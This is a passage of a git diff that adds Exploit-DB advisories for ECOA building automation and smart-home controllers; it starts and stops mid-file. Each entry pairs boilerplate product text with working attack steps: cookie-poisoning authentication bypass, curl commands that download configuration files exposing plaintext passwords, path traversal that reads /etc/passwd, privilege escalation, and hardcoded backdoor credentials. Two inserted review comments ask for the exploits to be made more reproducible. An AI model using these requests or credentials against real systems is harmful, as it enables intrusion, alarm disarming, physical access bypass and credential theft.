It's like a whole package, which provides +browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all +through web-pages operating, which works base on standard transmission Internet protocol. The +ECS0000160 provides a low industry cost. A truly friendly network interface which is simple +and easy to apply on factory floors. It supports from serial ports with options of RS485. + +#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden +installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A +conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, +integral and differential (P+I+D) and dead-zone control to control accurately. The controller +features contains the sensing system, proportional control systems, computing modules, control +modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, +air monitoring, lighting and power control, the use of premises for buildings, factories, offices, +conference rooms, restaurants, hotels, etc. + +Desc: +The Building Automation System / SmartHome allows users to perform certain actions via HTTP requests +without performing any validity checks to verify the requests. These actions can be exploited to +perform any CRUD operation like user creation, alarm shutdown and account password change with +administrative privileges if a logged-in user visits a malicious web site. 
+ +Tested on: EMBED/1.0 + Apache Tomcat/6.0.44 + Apache Tomcat/6.0.18 + Windows Server + MySQL Version 5.1.60 + MySQL Version 4.0.16 + Version 2.0.1.28 20180628 + + +Vulnerability discovered by Neurogenesia + @zeroscience + + +Advisory ID: ZSL-2021-5671 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5671.php + + +25.06.2021 + +-- + + +Cross-Site Request Forgery (CSRF) - Add / Modify Users or Disarm Alarm +---------------------------------------------------------------------- + +- CSRF exist in entire solution for any CRUD operation. + + +PoC: + + + +
+ + + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/50279.txt b/exploits/hardware/webapps/50279.txt new file mode 100644 index 000000000..b9d6fc732 --- /dev/null +++ b/exploits/hardware/webapps/50279.txt 
@@ -0,0 +1,121 @@ +# Exploit Title: ECOA Building Automation System - Cookie Poisoning Authentication Bypass +# Date: 25.06.2021 +# Exploit Author: Neurogenesia +# Vendor Homepage: http://www.ecoa.com.tw + +ECOA Building Automation System Cookie Poisoning Authentication Bypass + + +Vendor: ECOA Technologies Corp. +Product web page: http://www.ecoa.com.tw +Affected version: ECOA ECS Router Controller - ECS (FLASH) + ECOA RiskBuster Terminator - E6L45 + ECOA RiskBuster System - RB 3.0.0 + ECOA RiskBuster System - TRANE 1.0 + ECOA Graphic Control Software + ECOA SmartHome II - E9246 + ECOA RiskTerminator + +Summary: +#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are +designed to provide you with the latest in the Human Machine Interface (HMI) technology, +for completely monitoring and controlling management. It may be used singly for small and +medium sized facilities, could be linked together via the high-speed Ethernet to other +servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more +sophisticated applications. The Risk-Terminator practice Web basic conception that with +operation simply and conveniently, totally share risk and make sure of security. Even +remote sites may be controlled and monitored through Ethernet port, which base on standard +transferring protocol like XML, Modbus TCP/IP or BACnet or URL. + +#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP +networking technologies. It incorporates an embedded web server that can deliver user-specific +web pages to any PC or mobile terminal running internet browser software. A user with an +appropriate security codes can made adjustment or monitor the network control unit form +any internet access point in the world. It also provides network management, integration +and process control functions for any existing or new building controllers and microprocessor +based equipments or system in buildings. 
The management function provided by the RiskBuster +such as trend log and alarm generation improves building controllers and microprocessor +based equipments or system management and audit trail capabilities. The integration function +provided by the RiskBuster allows seamless integration such as information sharing (read/write) +between building controllers and microprocessor based equipments or system without any need +of major upgrade or equipments replacement and allow cost saving. The process control functions +provided by the RiskBuster allow global control action to be implemented across any building +controllers and microprocessor based equipments or system to allow full building control. The +RiskBuster provide a truly cost effective solution for any building automation or high level +integration application. A truly Ethernet network compliant feature allows the RiskBuster to +be install anywhere in the building. + +#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for +Building Automate System; Environment control system; HVAC control system and other types of +equipment. Being fully programmable it ensures complete application versatility, allowing +specific products to be created according to customer requests. This controller is a configurable +unitary controller based on the 32bit series microcomputer, with an on-board clock, have two +RS-485 local bus. + +#4 The ECS0000160 is a Router Controller for building and industry products based on various +microprocessors. It not only accessing information but also monitoring and controlling across +Internet directly. The ECS0000160 can totally replace and improve a typical system that always +has tedious panel and complex working process. An obviously benefit to our customers is that +ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed +to connect with singular specific operating system. 
It's like a whole package, which provides +browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all +through web-pages operating, which works base on standard transmission Internet protocol. The +ECS0000160 provides a low industry cost. A truly friendly network interface which is simple +and easy to apply on factory floors. It supports from serial ports with options of RS485. + +#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden +installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A +conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, +integral and differential (P+I+D) and dead-zone control to control accurately. The controller +features contains the sensing system, proportional control systems, computing modules, control +modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, +air monitoring, lighting and power control, the use of premises for buildings, factories, offices, +conference rooms, restaurants, hotels, etc. + +Desc: +The BAS controller suffers from an authentication bypass vulnerability. An unauthenticated attacker +through cookie poisoning can bypass authentication and disclose sensitive information and circumvent +physical access controls in smart homes and buildings and manipulate HVAC. + +Tested on: EMBED/1.0 + Apache Tomcat/6.0.44 + Apache Tomcat/6.0.18 + Windows Server + MySQL Version 5.1.60 + MySQL Version 4.0.16 + Version 2.0.1.28 20180628 + + +Vulnerability discovered by Neurogenesia + @zeroscience + + +Advisory ID: ZSL-2021-5672 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5672.php + + +25.06.2021 + +-- + + +Authentication Bypass +--------------------- + +- Authentication bypass happens by modifying the Cookie values. +- Setting the UCLS Cookie larger or equal to 19 bypasses security controls. 
+ + +Request: + +GET /menu.jsp?fname=../sysuse/system01.frm&time=5 HTTP/1.1 +Host: 192.168.1.3:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Cookie: JSESSIONID=t00tw00t; UCLS=251; UID=zero; PWD=science; ROOT=FOUND; AlmCt=0 +Upgrade-Insecure-Requests: 1 +Pragma: no-cache +Cache-Control: no-cache \ No newline at end of file diff --git a/exploits/hardware/webapps/50280.txt b/exploits/hardware/webapps/50280.txt new file mode 100644 index 000000000..f4039ea51 --- /dev/null +++ b/exploits/hardware/webapps/50280.txt 
@@ -0,0 +1,131 @@ +# Exploit Title: ECOA Building Automation System - Configuration Download Information Disclosure +# Date: 25.06.2021 +# Exploit Author: Neurogenesia +# Vendor Homepage: http://www.ecoa.com.tw + +ECOA Building Automation System Configuration Download Information Disclosure + + +Vendor: ECOA Technologies Corp. +Product web page: http://www.ecoa.com.tw +Affected version: ECOA ECS Router Controller - ECS (FLASH) + ECOA RiskBuster Terminator - E6L45 + ECOA RiskBuster System - RB 3.0.0 + ECOA RiskBuster System - TRANE 1.0 + ECOA Graphic Control Software + ECOA SmartHome II - E9246 + ECOA RiskTerminator + +Summary: +#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are +designed to provide you with the latest in the Human Machine Interface (HMI) technology, +for completely monitoring and controlling management. It may be used singly for small and +medium sized facilities, could be linked together via the high-speed Ethernet to other +servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more +sophisticated applications. The Risk-Terminator practice Web basic conception that with +operation simply and conveniently, totally share risk and make sure of security. Even +remote sites may be controlled and monitored through Ethernet port, which base on standard +transferring protocol like XML, Modbus TCP/IP or BACnet or URL. + +#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP +networking technologies. It incorporates an embedded web server that can deliver user-specific +web pages to any PC or mobile terminal running internet browser software. A user with an +appropriate security codes can made adjustment or monitor the network control unit form +any internet access point in the world. 
It also provides network management, integration +and process control functions for any existing or new building controllers and microprocessor +based equipments or system in buildings. The management function provided by the RiskBuster +such as trend log and alarm generation improves building controllers and microprocessor +based equipments or system management and audit trail capabilities. The integration function +provided by the RiskBuster allows seamless integration such as information sharing (read/write) +between building controllers and microprocessor based equipments or system without any need +of major upgrade or equipments replacement and allow cost saving. The process control functions +provided by the RiskBuster allow global control action to be implemented across any building +controllers and microprocessor based equipments or system to allow full building control. The +RiskBuster provide a truly cost effective solution for any building automation or high level +integration application. A truly Ethernet network compliant feature allows the RiskBuster to +be install anywhere in the building. + +#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for +Building Automate System; Environment control system; HVAC control system and other types of +equipment. Being fully programmable it ensures complete application versatility, allowing +specific products to be created according to customer requests. This controller is a configurable +unitary controller based on the 32bit series microcomputer, with an on-board clock, have two +RS-485 local bus. + +#4 The ECS0000160 is a Router Controller for building and industry products based on various +microprocessors. It not only accessing information but also monitoring and controlling across +Internet directly. The ECS0000160 can totally replace and improve a typical system that always +has tedious panel and complex working process. 
An obviously benefit to our customers is that +ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed +to connect with singular specific operating system. It's like a whole package, which provides +browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all +through web-pages operating, which works base on standard transmission Internet protocol. The +ECS0000160 provides a low industry cost. A truly friendly network interface which is simple +and easy to apply on factory floors. It supports from serial ports with options of RS485. + +#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden +installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A +conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, +integral and differential (P+I+D) and dead-zone control to control accurately. The controller +features contains the sensing system, proportional control systems, computing modules, control +modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, +air monitoring, lighting and power control, the use of premises for buildings, factories, offices, +conference rooms, restaurants, hotels, etc. + +Desc: +The BAS controller is vulnerable to configuration disclosure when direct object reference is made +to the syspara.dat or images.dat files using an HTTP GET request. This will enable the attacker to +disclose sensitive information and help her in authentication bypass, privilege escalation and full +system access. 
+ +Tested on: EMBED/1.0 + Apache Tomcat/6.0.44 + Apache Tomcat/6.0.18 + Windows Server + MySQL Version 5.1.60 + MySQL Version 4.0.16 + Version 2.0.1.28 20180628 + + +Vulnerability discovered by Neurogenesia + @zeroscience + + +Advisory ID: ZSL-2021-5673 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5673.php + + +25.06.2021 + +-- + + +Configuration / Backup Download / Privilege Escalation / Password Disclosure +---------------------------------------------------------------------------- + +- Unauthenticated config download reveals plain-text passwords + +$ curl -s -O -H 'Cookie: UCLS=19' http://192.168.1.3:8080/syspara.dat +$ curl -s -O -H 'Cookie: UCLS=19' http://192.168.1.3:8080/images.dat +$ strings * +... +... +/opt/webpage/pwsd.bin +/user +user +embed +power +1234 +1234 +/opt/webpage/system.bin +Oboothr=24 +bootmin=00 +OutIDWork=Y +language=big5 +seclanguage=Y +ValSet=Y +allpollTm=500 +httpusr=embed +httppwd=power +... +... \ No newline at end of file diff --git a/exploits/hardware/webapps/50281.txt b/exploits/hardware/webapps/50281.txt new file mode 100644 index 000000000..d29e73c82 --- /dev/null +++ b/exploits/hardware/webapps/50281.txt 
@@ -0,0 +1,114 @@ +# Exploit Title: ECOA Building Automation System - Hidden Backdoor Accounts and backdoor() Function +# Date: 25.06.2021 +# Exploit Author: Neurogenesia +# Vendor Homepage: http://www.ecoa.com.tw + +ECOA Building Automation System Hidden Backdoor Accounts and backdoor() Function + + +Vendor: ECOA Technologies Corp. +Product web page: http://www.ecoa.com.tw +Affected version: ECOA ECS Router Controller - ECS (FLASH) + ECOA RiskBuster Terminator - E6L45 + ECOA RiskBuster System - RB 3.0.0 + ECOA RiskBuster System - TRANE 1.0 + ECOA Graphic Control Software + ECOA SmartHome II - E9246 + ECOA RiskTerminator + +Summary: +#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are +designed to provide you with the latest in the Human Machine Interface (HMI) technology, +for completely monitoring and controlling management. It may be used singly for small and +medium sized facilities, could be linked together via the high-speed Ethernet to other +servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more +sophisticated applications. The Risk-Terminator practice Web basic conception that with +operation simply and conveniently, totally share risk and make sure of security. Even +remote sites may be controlled and monitored through Ethernet port, which base on standard +transferring protocol like XML, Modbus TCP/IP or BACnet or URL. + +#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP +networking technologies. It incorporates an embedded web server that can deliver user-specific +web pages to any PC or mobile terminal running internet browser software. A user with an +appropriate security codes can made adjustment or monitor the network control unit form +any internet access point in the world. 
It also provides network management, integration +and process control functions for any existing or new building controllers and microprocessor +based equipments or system in buildings. The management function provided by the RiskBuster +such as trend log and alarm generation improves building controllers and microprocessor +based equipments or system management and audit trail capabilities. The integration function +provided by the RiskBuster allows seamless integration such as information sharing (read/write) +between building controllers and microprocessor based equipments or system without any need +of major upgrade or equipments replacement and allow cost saving. The process control functions +provided by the RiskBuster allow global control action to be implemented across any building +controllers and microprocessor based equipments or system to allow full building control. The +RiskBuster provide a truly cost effective solution for any building automation or high level +integration application. A truly Ethernet network compliant feature allows the RiskBuster to +be install anywhere in the building. + +#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for +Building Automate System; Environment control system; HVAC control system and other types of +equipment. Being fully programmable it ensures complete application versatility, allowing +specific products to be created according to customer requests. This controller is a configurable +unitary controller based on the 32bit series microcomputer, with an on-board clock, have two +RS-485 local bus. + +#4 The ECS0000160 is a Router Controller for building and industry products based on various +microprocessors. It not only accessing information but also monitoring and controlling across +Internet directly. The ECS0000160 can totally replace and improve a typical system that always +has tedious panel and complex working process. 
An obviously benefit to our customers is that +ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed +to connect with singular specific operating system. It's like a whole package, which provides +browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all +through web-pages operating, which works base on standard transmission Internet protocol. The +ECS0000160 provides a low industry cost. A truly friendly network interface which is simple +and easy to apply on factory floors. It supports from serial ports with options of RS485. + +#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden +installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A +conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, +integral and differential (P+I+D) and dead-zone control to control accurately. The controller +features contains the sensing system, proportional control systems, computing modules, control +modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, +air monitoring, lighting and power control, the use of premises for buildings, factories, offices, +conference rooms, restaurants, hotels, etc. + +Desc: +The BAS controller has hidden backdoors in several binaries that serve the web application. Any +unauthenticated attacker can download all the resources and binaries/services that serve the controller +and search for the 'backdoor()' function in httpser.elf as well as discover hidden credentials for +backdoor access with full functionality of the Smart Home, Access Control and Building Automation +System solutions. 
+ +Tested on: EMBED/1.0 + Apache Tomcat/6.0.44 + Apache Tomcat/6.0.18 + Windows Server + MySQL Version 5.1.60 + MySQL Version 4.0.16 + Version 2.0.1.28 20180628 + + +Vulnerability discovered by Neurogenesia + @zeroscience + + +Advisory ID: ZSL-2021-5674 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5674.php + + +25.06.2021 + +-- + + +Backdoor Accounts / Authentication Bypass +----------------------------------------- + +- Example of backdoors revealed in httpser.elf binary: +... +... + VAR2 = strstr(ARG1,"username=humexembed&password=simonamandoor"); + if (VAR2 == (char *)0x0) { + VAR2 = strstr(ARG1,"username=amandoor&password=amandoor"); +... +... \ No newline at end of file diff --git a/exploits/hardware/webapps/50284.txt b/exploits/hardware/webapps/50284.txt new file mode 100644 index 000000000..63e0244ce --- /dev/null +++ b/exploits/hardware/webapps/50284.txt 
@@ -0,0 +1,110 @@ +# Exploit Title: ECOA Building Automation System - Remote Privilege Escalation +# Date: 25.06.2021 +# Exploit Author: Neurogenesia +# Vendor Homepage: http://www.ecoa.com.tw + +ECOA Building Automation System Remote Privilege Escalation + + +Vendor: ECOA Technologies Corp. +Product web page: http://www.ecoa.com.tw +Affected version: ECOA ECS Router Controller - ECS (FLASH) + ECOA RiskBuster Terminator - E6L45 + ECOA RiskBuster System - RB 3.0.0 + ECOA RiskBuster System - TRANE 1.0 + ECOA Graphic Control Software + ECOA SmartHome II - E9246 + ECOA RiskTerminator + +Summary: +#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are +designed to provide you with the latest in the Human Machine Interface (HMI) technology, +for completely monitoring and controlling management. It may be used singly for small and +medium sized facilities, could be linked together via the high-speed Ethernet to other +servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more +sophisticated applications. The Risk-Terminator practice Web basic conception that with +operation simply and conveniently, totally share risk and make sure of security. Even +remote sites may be controlled and monitored through Ethernet port, which base on standard +transferring protocol like XML, Modbus TCP/IP or BACnet or URL. + +#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP +networking technologies. It incorporates an embedded web server that can deliver user-specific +web pages to any PC or mobile terminal running internet browser software. A user with an +appropriate security codes can made adjustment or monitor the network control unit form +any internet access point in the world. It also provides network management, integration +and process control functions for any existing or new building controllers and microprocessor +based equipments or system in buildings. 
The management function provided by the RiskBuster +such as trend log and alarm generation improves building controllers and microprocessor +based equipments or system management and audit trail capabilities. The integration function +provided by the RiskBuster allows seamless integration such as information sharing (read/write) +between building controllers and microprocessor based equipments or system without any need +of major upgrade or equipments replacement and allow cost saving. The process control functions +provided by the RiskBuster allow global control action to be implemented across any building +controllers and microprocessor based equipments or system to allow full building control. The +RiskBuster provide a truly cost effective solution for any building automation or high level +integration application. A truly Ethernet network compliant feature allows the RiskBuster to +be install anywhere in the building. + +#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for +Building Automate System; Environment control system; HVAC control system and other types of +equipment. Being fully programmable it ensures complete application versatility, allowing +specific products to be created according to customer requests. This controller is a configurable +unitary controller based on the 32bit series microcomputer, with an on-board clock, have two +RS-485 local bus. + +#4 The ECS0000160 is a Router Controller for building and industry products based on various +microprocessors. It not only accessing information but also monitoring and controlling across +Internet directly. The ECS0000160 can totally replace and improve a typical system that always +has tedious panel and complex working process. An obviously benefit to our customers is that +ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed +to connect with singular specific operating system. 
It's like a whole package, which provides +browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all +through web-pages operating, which works base on standard transmission Internet protocol. The +ECS0000160 provides a low industry cost. A truly friendly network interface which is simple +and easy to apply on factory floors. It supports from serial ports with options of RS485. + +#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden +installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A +conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, +integral and differential (P+I+D) and dead-zone control to control accurately. The controller +features contains the sensing system, proportional control systems, computing modules, control +modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, +air monitoring, lighting and power control, the use of premises for buildings, factories, offices, +conference rooms, restaurants, hotels, etc. + +Desc: +The BAS controller is vulnerable to weak access control mechanism allowing any user to escalate +privileges by disclosing credentials of administrative accounts in plain-text. + +Tested on: EMBED/1.0 + Apache Tomcat/6.0.44 + Apache Tomcat/6.0.18 + Windows Server + MySQL Version 5.1.60 + MySQL Version 4.0.16 + Version 2.0.1.28 20180628 + + +Vulnerability discovered by Neurogenesia + @zeroscience + + +Advisory ID: ZSL-2021-5677 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5677.php + + +25.06.2021 + +-- + + +Privilege Escalation +-------------------- + +- Any user can navigate to the User Edit page (useredt.jsp) and see the password of other users in clear-text. 
+ + +Request: + +$ curl -s http://192.168.1.3:8080//useredt.jsp -H "Cookie: JSESSIONID=t00tw00t; UCLS=19; UID=user; PWD=user; ROOT=FOUND; AlmCt=0" |findstr embed +embedpower19 rootembed19  \ No newline at end of file diff --git a/exploits/hardware/webapps/50285.txt b/exploits/hardware/webapps/50285.txt new file mode 100644 index 000000000..63456514a --- /dev/null +++ b/exploits/hardware/webapps/50285.txt 
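Review bot: the single PoC request in this hunk (`$ curl -s http://192.168.1.3:8080//useredt.jsp -H "Cookie: JSESSIONID=t00tw00t; UCLS=19; UID=user; PWD=user; ROOT=FOUND; AlmCt=0" |findstr embed`) does not isolate the privilege-escalation claim: it supplies an invented `JSESSIONID` and client-chosen `ROOT=FOUND` / `UCLS=19` cookie values, so what it demonstrates is the cookie-controlled access check rather than "any user can navigate to the User Edit page". Reproduce with the cookie a real `user` login receives and the role fields left unchanged, and show the response excerpt around `embedpower19 rootembed19` so the reader can see these are the password fields of other accounts. Two smaller nits: the URL has a doubled slash (`8080//useredt.jsp`), and the command mixes a `$` Unix prompt with the Windows `findstr` (use `grep`, or show a `C:\>` prompt).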
@@ -0,0 +1,133 @@ +# Exploit Title: ECOA Building Automation System - Local File Disclosure +# Date: 25.06.2021 +# Exploit Author: Neurogenesia +# Vendor Homepage: http://www.ecoa.com.tw + +ECOA Building Automation System Local File Disclosure Vulnerability + + +Vendor: ECOA Technologies Corp. +Product web page: http://www.ecoa.com.tw +Affected version: ECOA ECS Router Controller - ECS (FLASH) + ECOA RiskBuster Terminator - E6L45 + ECOA RiskBuster System - RB 3.0.0 + ECOA RiskBuster System - TRANE 1.0 + ECOA Graphic Control Software + ECOA SmartHome II - E9246 + ECOA RiskTerminator + +Summary: +#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are +designed to provide you with the latest in the Human Machine Interface (HMI) technology, +for completely monitoring and controlling management. It may be used singly for small and +medium sized facilities, could be linked together via the high-speed Ethernet to other +servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more +sophisticated applications. The Risk-Terminator practice Web basic conception that with +operation simply and conveniently, totally share risk and make sure of security. Even +remote sites may be controlled and monitored through Ethernet port, which base on standard +transferring protocol like XML, Modbus TCP/IP or BACnet or URL. + +#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP +networking technologies. It incorporates an embedded web server that can deliver user-specific +web pages to any PC or mobile terminal running internet browser software. A user with an +appropriate security codes can made adjustment or monitor the network control unit form +any internet access point in the world. It also provides network management, integration +and process control functions for any existing or new building controllers and microprocessor +based equipments or system in buildings. 
The management function provided by the RiskBuster +such as trend log and alarm generation improves building controllers and microprocessor +based equipments or system management and audit trail capabilities. The integration function +provided by the RiskBuster allows seamless integration such as information sharing (read/write) +between building controllers and microprocessor based equipments or system without any need +of major upgrade or equipments replacement and allow cost saving. The process control functions +provided by the RiskBuster allow global control action to be implemented across any building +controllers and microprocessor based equipments or system to allow full building control. The +RiskBuster provide a truly cost effective solution for any building automation or high level +integration application. A truly Ethernet network compliant feature allows the RiskBuster to +be install anywhere in the building. + +#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for +Building Automate System; Environment control system; HVAC control system and other types of +equipment. Being fully programmable it ensures complete application versatility, allowing +specific products to be created according to customer requests. This controller is a configurable +unitary controller based on the 32bit series microcomputer, with an on-board clock, have two +RS-485 local bus. + +#4 The ECS0000160 is a Router Controller for building and industry products based on various +microprocessors. It not only accessing information but also monitoring and controlling across +Internet directly. The ECS0000160 can totally replace and improve a typical system that always +has tedious panel and complex working process. An obviously benefit to our customers is that +ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed +to connect with singular specific operating system. 
It's like a whole package, which provides +browsers an easy platform to monitor and control the doors, alarms, devices, etc. that all +through web-pages operating, which works base on standard transmission Internet protocol. The +ECS0000160 provides a low industry cost. A truly friendly network interface which is simple +and easy to apply on factory floors. It supports from serial ports with options of RS485. + +#5 HOME SERVER-EHC9246150 - This web basic home-server is with the specifications of hidden +installation, 32bits microcomputer and I/O Peripheral expansion circuit, which include: D/A +conversion circuit, A/D conversion circuit and optical isolation circuit, using default proportional, +integral and differential (P+I+D) and dead-zone control to control accurately. The controller +features contains the sensing system, proportional control systems, computing modules, control +modules, alarm detection system, and so on. It mainly used in building control, plant monitoring, +air monitoring, lighting and power control, the use of premises for buildings, factories, offices, +conference rooms, restaurants, hotels, etc. + +Desc: +The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST +parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and +disclose sensitive and system information. + +Tested on: EMBED/1.0 + Apache Tomcat/6.0.44 + Apache Tomcat/6.0.18 + Windows Server + MySQL Version 5.1.60 + MySQL Version 4.0.16 + Version 2.0.1.28 20180628 + + +Vulnerability discovered by Neurogenesia + @zeroscience + + +Advisory ID: ZSL-2021-5679 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php + + +25.06.2021 + +-- + + +Arbitrary File Disclosure +------------------------- + +- Attackers can disclose any file by abusing the 'fname' POST parameter in viewlog.jsp and reveal sensitive information. 
+ + +Request: + +POST /viewlog.jsp HTTP/1.1 +Host: 192.168.1.3:8080 + +yr=2021&mh=6&fname=../../../../../../../../etc/passwd + + +root:x:0:0:root:/root:/bin/sh +bin:x:1:1:bin:/bin:/sbin/nologin +daemon:x:2:2:daemon:/sbin:/sbin/nologin +adm:x:3:4:adm:/var/adm:/sbin/nologin +lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin +sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/spool/mail:/sbin/nologin +news:x:9:13:news:/var/spool/news: +uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin +operator:x:11:0:operator:/root:/sbin/nologin +games:x:12:100:games:/usr/games:/sbin/nologin +gopher:x:13:30:gopher:/var/gopher:/sbin/nologin +ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin +nobody:x:99:99:Nobody:/:/sbin/nologin +... +... \ No newline at end of file diff --git a/exploits/hardware/webapps/50286.txt b/exploits/hardware/webapps/50286.txt new file mode 100644 index 000000000..9523d81ac --- /dev/null +++ b/exploits/hardware/webapps/50286.txt 
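Review bot: the raw request (`POST /viewlog.jsp HTTP/1.1`, `Host: 192.168.1.3:8080`, body `yr=2021&mh=6&fname=../../../../../../../../etc/passwd`) is missing the `Content-Type: application/x-www-form-urlencoded` and `Content-Length` headers, so it cannot be replayed as shown; it also carries no `Cookie`, so the advisory should state explicitly whether viewlog.jsp is reachable before authentication (the Desc only says "attackers"). "Tested on: Windows Server" also sits oddly beside an `/etc/passwd` listing with `root:x:0:0:root:/root:/bin/sh`; one sentence on which of the listed platforms produced this output, and on why `yr` and `mh` must be present, would make the entry reproducible.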
@@ -0,0 +1,110 @@ +# Exploit Title: ECOA Building Automation System - Arbitrary File Deletion +# Date: 25.06.2021 +# Exploit Author: Neurogenesia +# Vendor Homepage: http://www.ecoa.com.tw + +ECOA Building Automation System Arbitrary File Deletion + + +Vendor: ECOA Technologies Corp. +Product web page: http://www.ecoa.com.tw +Affected version: ECOA ECS Router Controller - ECS (FLASH) + ECOA RiskBuster Terminator - E6L45 + ECOA RiskBuster System - RB 3.0.0 + ECOA RiskBuster System - TRANE 1.0 + ECOA Graphic Control Software + ECOA SmartHome II - E9246 + ECOA RiskTerminator + +Summary: +#1 The Risk-Terminator Web Graphic control BEMS (Building Energy Management System) are +designed to provide you with the latest in the Human Machine Interface (HMI) technology, +for completely monitoring and controlling management. It may be used singly for small and +medium sized facilities, could be linked together via the high-speed Ethernet to other +servers that suit to World Wide Web (WWW) or Local Area Network (LAN) for large and more +sophisticated applications. The Risk-Terminator practice Web basic conception that with +operation simply and conveniently, totally share risk and make sure of security. Even +remote sites may be controlled and monitored through Ethernet port, which base on standard +transferring protocol like XML, Modbus TCP/IP or BACnet or URL. + +#2 The RiskBuster is a Web enabled network Router Server that uses Ethernet and TCP/IP +networking technologies. It incorporates an embedded web server that can deliver user-specific +web pages to any PC or mobile terminal running internet browser software. A user with an +appropriate security codes can made adjustment or monitor the network control unit form +any internet access point in the world. It also provides network management, integration +and process control functions for any existing or new building controllers and microprocessor +based equipments or system in buildings. 
The management function provided by the RiskBuster +such as trend log and alarm generation improves building controllers and microprocessor +based equipments or system management and audit trail capabilities. The integration function +provided by the RiskBuster allows seamless integration such as information sharing (read/write) +between building controllers and microprocessor based equipments or system without any need +of major upgrade or equipments replacement and allow cost saving. The process control functions +provided by the RiskBuster allow global control action to be implemented across any building +controllers and microprocessor based equipments or system to allow full building control. The +RiskBuster provide a truly cost effective solution for any building automation or high level +integration application. A truly Ethernet network compliant feature allows the RiskBuster to +be install anywhere in the building. + +#3 ECM0000160 Digital Logic Controller (DLC) are Pre-programmed controller it intended for +Building Automate System; Environment control system; HVAC control system and other types of +equipment. Being fully programmable it ensures complete application versatility, allowing +specific products to be created according to customer requests. This controller is a configurable +unitary controller based on the 32bit series microcomputer, with an on-board clock, have two +RS-485 local bus. + +#4 The ECS0000160 is a Router Controller for building and industry products based on various +microprocessors. It not only accessing information but also monitoring and controlling across +Internet directly. The ECS0000160 can totally replace and improve a typical system that always +has tedious panel and complex working process. An obviously benefit to our customers is that +ECS0000160 enabling them to interact with their systems anytime, anywhere, not only just allowed +to connect with singular specific operating system. 
